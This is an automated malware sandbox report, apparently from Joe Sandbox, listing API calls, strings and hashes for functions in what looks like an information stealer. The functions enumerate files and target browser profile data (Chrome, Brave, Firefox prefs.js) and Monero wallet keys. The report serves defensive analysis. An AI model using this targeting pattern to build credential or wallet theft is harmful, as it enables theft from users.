                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 7dd4c0feb362d95909819e6225414769a62ac08833958830920f75594cf34500
                                  • Instruction ID: 79a0272cff400053959155541b0832f5268180fff4ce69642753dfd4753d9ba1
                                  • Opcode Fuzzy Hash: 7dd4c0feb362d95909819e6225414769a62ac08833958830920f75594cf34500
                                  • Instruction Fuzzy Hash: A1F0E2B1641308BBE718AAA4AC49FAEB7E8E705B15F300458F904E7280D5719E50CAA5
                                  Function 00231190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                    • Part of subcall function 002478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                    • Part of subcall function 002478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                    • Part of subcall function 00247850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                    • Part of subcall function 00247850: RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                    • Part of subcall function 00247850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                  • ExitProcess.KERNEL32 ref: 002311C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: d6405beb64c317fbf0d7cbbbbbffd3f7de1d26d7d4f8f43663d989e68abfa145
                                  • Instruction ID: d32beb3ba99f550f4df538da412f5b4cd9af0dfafee5313921229ca2342d683d
                                  • Opcode Fuzzy Hash: d6405beb64c317fbf0d7cbbbbbffd3f7de1d26d7d4f8f43663d989e68abfa145
                                  • Instruction Fuzzy Hash: 51E012B593430253CA0877B0AC0AB2E329C5B54746F040834FA0DD2102FA65E8709A6A

                                  Non-executed Functions

                                  Function 002438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 002438CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002438E3
                                  • lstrcat.KERNEL32(?,?), ref: 00243935
                                  • StrCmpCA.SHLWAPI(?,00250F70), ref: 00243947
                                  • StrCmpCA.SHLWAPI(?,00250F74), ref: 0024395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00243C67
                                  • FindClose.KERNEL32(000000FF), ref: 00243C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 37521437ffd1dbf8c7a8f33757baca0418628bc60e6dba4decfa83684216d66d
                                  • Instruction ID: 3fc3f56a50b67d3c3f49447b0c01bf07160dd90b818977d9991a9b66effbe399
                                  • Opcode Fuzzy Hash: 37521437ffd1dbf8c7a8f33757baca0418628bc60e6dba4decfa83684216d66d
                                  • Instruction Fuzzy Hash: F3A162B2910219ABDB24EFA4DC85FEE7378BF84301F044598E50D96141EB749BA4CF66
                                  Function 0023BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00250B32,00250B2B,00000000,?,?,?,002513F4,00250B2A), ref: 0023BEF5
                                  • StrCmpCA.SHLWAPI(?,002513F8), ref: 0023BF4D
                                  • StrCmpCA.SHLWAPI(?,002513FC), ref: 0023BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0023C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 3b6953c5a1df0f8eace2e908bbfba447872add5b29d44592791dd268cbef4cc3
                                  • Instruction ID: e2ecb8e7194dfb4264921f2d41522566101493af9c6c237bcd238be75884bf1e
                                  • Opcode Fuzzy Hash: 3b6953c5a1df0f8eace2e908bbfba447872add5b29d44592791dd268cbef4cc3
                                  • Instruction Fuzzy Hash: DF425872960104ABDB18FB70DD96EED737DAF94300F404568F90AA6181EF349B69CF92
                                  Function 00244910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0024492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                  • StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                  • StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00244B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: ffe14339c165f91365cf03cbd46833ef183e301c9a45c81bdf525947de20065c
                                  • Instruction ID: 6e602e50e53f30c1f698d385bddc3d9c95ad9eec31a3e41f100ee162cdcd329e
                                  • Opcode Fuzzy Hash: ffe14339c165f91365cf03cbd46833ef183e301c9a45c81bdf525947de20065c
                                  • Instruction Fuzzy Hash: 906144B2910218ABCB24FBA0DC85FEE737CBB88701F044598B50D96141EA71DBA5CF96
                                  Function 00244570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00244580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00244587
                                  • wsprintfA.USER32 ref: 002445A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002445BD
                                  • StrCmpCA.SHLWAPI(?,00250FC4), ref: 002445EB
                                  • StrCmpCA.SHLWAPI(?,00250FC8), ref: 00244601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0024468B
                                  • FindClose.KERNEL32(000000FF), ref: 002446A0
                                  • lstrcat.KERNEL32(?,0104FB90), ref: 002446C5
                                  • lstrcat.KERNEL32(?,0104E548), ref: 002446D8
                                  • lstrlen.KERNEL32(?), ref: 002446E5
                                  • lstrlen.KERNEL32(?), ref: 002446F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: aa501a5662ce8ed9a7239560eb5cdca95932a177355992f2054c22e77b89ebd5
                                  • Instruction ID: 7b480a78710beadf3cbb3c881b3cb19ffc49f29012ab4f4a53ab951443fde54e
                                  • Opcode Fuzzy Hash: aa501a5662ce8ed9a7239560eb5cdca95932a177355992f2054c22e77b89ebd5
                                  • Instruction Fuzzy Hash: CD5144B2960218ABC724FB70DC89FED737CAB94300F404598F60D96190EB749BA48F96
                                  Function 00243EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00243EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00243EDA
                                  • StrCmpCA.SHLWAPI(?,00250FAC), ref: 00243F08
                                  • StrCmpCA.SHLWAPI(?,00250FB0), ref: 00243F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0024406C
                                  • FindClose.KERNEL32(000000FF), ref: 00244081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 32844ca79320324e4b6d99739be1c1b89b91ced6f8da421c654a81828700a0c3
                                  • Instruction ID: f5c051b44f9654d1b1ff7cddab7b59e95e0c9ddaa0d5f15109d110184cb7191e
                                  • Opcode Fuzzy Hash: 32844ca79320324e4b6d99739be1c1b89b91ced6f8da421c654a81828700a0c3
                                  • Instruction Fuzzy Hash: D7514CB2910218ABCB28FBB0DC85EEE737CBB84300F404598B65D96141DB75DBA9CF55
                                  Function 0023ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0023ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0023ED55
                                  • StrCmpCA.SHLWAPI(?,00251538), ref: 0023EDAB
                                  • StrCmpCA.SHLWAPI(?,0025153C), ref: 0023EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0023F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: dad8e95bcdc735bb4d2d0822bb3ca7c7c16f8ebf8acb5b2fb0caa4baf9081db5
                                  • Instruction ID: 87f89895129d6924a3485231518dc07d8f6ffeccf2c70daab5533e328f6c78d5
                                  • Opcode Fuzzy Hash: dad8e95bcdc735bb4d2d0822bb3ca7c7c16f8ebf8acb5b2fb0caa4baf9081db5
                                  • Instruction Fuzzy Hash: 31E1B4729611189AFB58FB60DC52EEE7338EF54300F4145A9B50B62092EF306FAACF55
                                  Function 0023F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002515B8,00250D96), ref: 0023F71E
                                  • StrCmpCA.SHLWAPI(?,002515BC), ref: 0023F76F
                                  • StrCmpCA.SHLWAPI(?,002515C0), ref: 0023F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0023FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 8452bb3cd77940858604de74583e1bb3ca37fea66a8b5c25fda7de0d3f9b6584
                                  • Instruction ID: 4b1a6e3f56e5f2452e049c4e9fc1726ccfa8f0cdbf4392926f5685150b019236
                                  • Opcode Fuzzy Hash: 8452bb3cd77940858604de74583e1bb3ca37fea66a8b5c25fda7de0d3f9b6584
                                  • Instruction Fuzzy Hash: D2B135719601189BDB28FF60DD96BEE7379EF94300F4085A8E40A96151EF306B69CF92
                                  Function 002316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0025510C,?,?,?,002551B4,?,?,00000000,?,00000000), ref: 00231923
                                  • StrCmpCA.SHLWAPI(?,0025525C), ref: 00231973
                                  • StrCmpCA.SHLWAPI(?,00255304), ref: 00231989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00231D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00231DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00231E20
                                  • FindClose.KERNEL32(000000FF), ref: 00231E32
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
